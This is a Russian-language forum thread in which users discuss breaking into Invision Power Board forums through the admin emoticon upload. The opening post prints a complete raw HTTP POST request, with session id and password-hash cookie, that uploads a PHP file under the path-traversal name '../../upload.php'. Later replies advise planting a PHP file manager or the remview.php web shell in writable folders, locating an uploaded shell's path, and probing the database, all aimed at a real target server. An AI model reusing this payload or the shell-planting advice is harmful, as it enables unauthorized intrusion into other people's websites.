![]() |
Вопрос по форуму IPB
Кто нить помогите, что за хрень
вот пишу значит код POST http://site.com/admin.php?adsess=2c9...b0319a74d80531 HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://site.com/admin.php?adsess=2c9...ct=op&code=emo Accept-Language: ru Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Length: 677 Pragma: no-cache Cookie: member_id=5716; pass_hash=95cc6b4ac5abdeadc74b73a8ba7200d9; -----------------------------7d43942c405bc Content-Disposition: form-data; name="adsess" 2c9b9a61a1a17a542bb0319a74d80531 -----------------------------7d43942c405bc Content-Disposition: form-data; name="code" emo_upload -----------------------------7d43942c405bc Content-Disposition: form-data; name="act" op -----------------------------7d43942c405bc Content-Disposition: form-data; name="MAX_FILE_SIZE" 10000000000 -----------------------------7d43942c405bc Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../upload.php" Content-Type: application/octet-stream "some code here" -----------------------------7d43942c405bc-- только в выбранную папку ничего не грузится а грузится все в папку emoticons хотя должно в корневую папку форума, я много вариантов пробовал, скажите где ошибка, на локалхосте кстати все работает нормально в любую папку кидает файл, а вот на реальном сервере только в emoticons... |
У меня на локалхосте только в emoticons а на серверах не пробовал.
Возможны ограничения по правам. Да и на Windows'е это тоже криво работает. |
Лично я и не смог организовать загрузку файлов через етот метод :(
|
Если грузится вообще(!) хоть в emoticons это уже хорошо,значит она открыта на запись! Залевай туда какой-ниить php файл менеджер и дело в шляпе.Нахрена тебе в корневом светиться вообще?
И в emoticons можно заливать прямо из админки если папка открыта на запись. |
в том то и дело что на том серваке который мне нужен там в паку emoticons запрет на заливку
|
Попрбуй залить через inet-crack в папку uploads она обычно открыта для записи.
|
Я уже все перепробовал и inetcrack и чем только непробовал, короче не знаю что делать...
|
Вы вот тут советуете прикрепить remview.php к посту. Если я заливаю картинку то путь к ней что то вроде:/upload/p21-32-343432, а как вы находите путь к шеллу? Пробовал заливать картинки несколько раз подряд, путь всегда разный, так что угадать не получается!
|
тоеретичке в Http запросе надо поставить в имени файла
../../имя тогда путь локально отсечется и зальется на сервер с учетом ../.. однако у мен ятак не получалось |
А если в БД поковырять, наверняка так где нить, что нить да записано?
Ps: :rolleyes: |
| Время: 20:34 |